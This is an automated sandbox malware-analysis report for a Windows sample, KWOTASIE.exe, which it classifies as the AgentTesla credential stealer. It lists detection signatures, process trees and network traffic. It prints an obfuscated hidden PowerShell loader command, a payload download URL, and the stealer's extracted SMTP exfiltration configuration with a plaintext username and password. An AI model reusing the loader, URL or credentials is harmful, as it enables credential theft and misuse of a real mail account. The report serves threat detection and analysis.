Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KWOTASIE.exe

Overview

General Information

Sample name:KWOTASIE.exe
Analysis ID:1465894
MD5:ecbec21dcfa39a1131d2a79acdf73f88
SHA1:6b9366674e34118ec2881ab8d0ae5a5f5077a44d
SHA256:ca595e27f24e0fc84bd5627ec36baae36bcc24018e638ed2ec7c7a6b1fe7b653
Tags:AgentTeslaexeGuLoader
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • KWOTASIE.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\KWOTASIE.exe" MD5: ECBEC21DCFA39A1131D2A79ACDF73F88)
    • powershell.exe (PID: 2888 cmdline: "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wab.exe (PID: 5032 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.lumies.co.za", "Username": "books@lumies.co.za", "Password": "vj$)KFsCyFOr"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.3292987188.0000000021B71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: wab.exe PID: 5032JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: wab.exe PID: 5032JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 102.130.125.173, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 5032, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49717
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)", CommandLine: "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KWOTASIE.exe", ParentImage: C:\Users\user\Desktop\KWOTASIE.exe, ParentProcessId: 6756, ParentProcessName: KWOTASIE.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)", ProcessId: 2888, ProcessName: powershell.exe
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: KWOTASIE.exeAvira: detected
            Source: http://zakk.co.za/GHAchl0.binAvira URL Cloud: Label: malware
            Source: wab.exe.5032.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.lumies.co.za", "Username": "books@lumies.co.za", "Password": "vj$)KFsCyFOr"}
            Source: KWOTASIE.exeVirustotal: Detection: 9%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: KWOTASIE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: KWOTASIE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040595A
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_0040658F FindFirstFileW,FindClose,0_2_0040658F
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
            Source: global trafficTCP traffic: 192.168.2.5:49717 -> 102.130.125.173:587
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
            Source: Joe Sandbox ViewASN Name: xneeloZA xneeloZA
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficTCP traffic: 192.168.2.5:49717 -> 102.130.125.173:587
            Source: global trafficHTTP traffic detected: GET /GHAchl0.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: zakk.co.zaCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /GHAchl0.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: zakk.co.zaCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: zakk.co.za
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: mail.lumies.co.za
            Source: wab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: wab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.lumies.co.za
            Source: KWOTASIE.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.len
            Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: KWOTASIE.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: KWOTASIE.exeString found in binary or memory: http://s.symcd.com06
            Source: wab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: KWOTASIE.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: KWOTASIE.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: KWOTASIE.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: wab.exe, 00000006.00000002.3277621644.00000000007B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zakk.co.za/GHAchl0.bin
            Source: KWOTASIE.exeString found in binary or memory: https://d.symcb.com/cps0%
            Source: KWOTASIE.exeString found in binary or memory: https://d.symcb.com/rpa0
            Source: KWOTASIE.exeString found in binary or memory: https://d.symcb.com/rpa0.
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053EF
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
            Source: C:\Users\user\Desktop\KWOTASIE.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeFile created: C:\Windows\resources\0809\xanthochroi.iniJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_004069560_2_00406956
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_00404C2C0_2_00404C2C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00334AC86_2_00334AC8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0033EC606_2_0033EC60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0033AD206_2_0033AD20
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00333EB06_2_00333EB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_003341F86_2_003341F8
            Source: KWOTASIE.exeStatic PE information: invalid certificate
            Source: KWOTASIE.exe, 00000000.00000000.2026782822.00000000004A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerumkapsel.exe2 vs KWOTASIE.exe
            Source: KWOTASIE.exeBinary or memory string: OriginalFilenamerumkapsel.exe2 vs KWOTASIE.exe
            Source: KWOTASIE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/11@3/3
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046B0
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
            Source: C:\Users\user\Desktop\KWOTASIE.exeFile created: C:\Users\user\AppData\Local\InnoxiousJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_03
            Source: C:\Users\user\Desktop\KWOTASIE.exeFile created: C:\Users\user\AppData\Local\Temp\nsh1BD7.tmpJump to behavior
            Source: KWOTASIE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\KWOTASIE.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: KWOTASIE.exeVirustotal: Detection: 9%
            Source: C:\Users\user\Desktop\KWOTASIE.exeFile read: C:\Users\user\Desktop\KWOTASIE.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\KWOTASIE.exe "C:\Users\user\Desktop\KWOTASIE.exe"
            Source: C:\Users\user\Desktop\KWOTASIE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Users\user\Desktop\KWOTASIE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
